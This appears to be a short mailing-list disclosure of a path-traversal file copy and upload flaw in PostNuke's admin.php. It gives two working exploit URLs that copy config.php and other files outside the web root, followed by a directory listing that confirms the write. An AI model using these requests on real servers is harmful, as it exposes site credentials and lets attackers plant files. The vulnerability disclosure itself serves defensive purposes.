supergate@twlc.net wrote: > Summary > This time the bug is really dangerous...it allows you to 'cp' any file on > the box... or even upload files... and even copy outside the postnuke path: http://somehost/nukepath/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/../../../../../../../tmp/&userfile=config.php&userfile_name=hacked.txt or for example: http://somehost/nukepath/admin.php?upload=1&wdir=/../../../../../../../tmp&userfile=/../../../../../../../tmp/copyme.txt&userfile_name=/../../../../../../../tmp/hacked.txt root@somehost:/tmp > ls -la total 20 drwxrwxrwt 8 root root 2048 Sep 25 13:37 . drwxr-xr-x 19 root root 2048 Feb 28 2001 .. drwxrwxrwt 2 root root 2048 Mar 6 2001 .X11-unix -rw-r--r-- 1 root root 851 Sep 25 13:37 copyme.txt -rwxr-xr-x 1 wwwrun wwwrun 851 Sep 25 13:37 hacked.txt ... Postnuke breaks with elemntary secure coding practices... /ihq
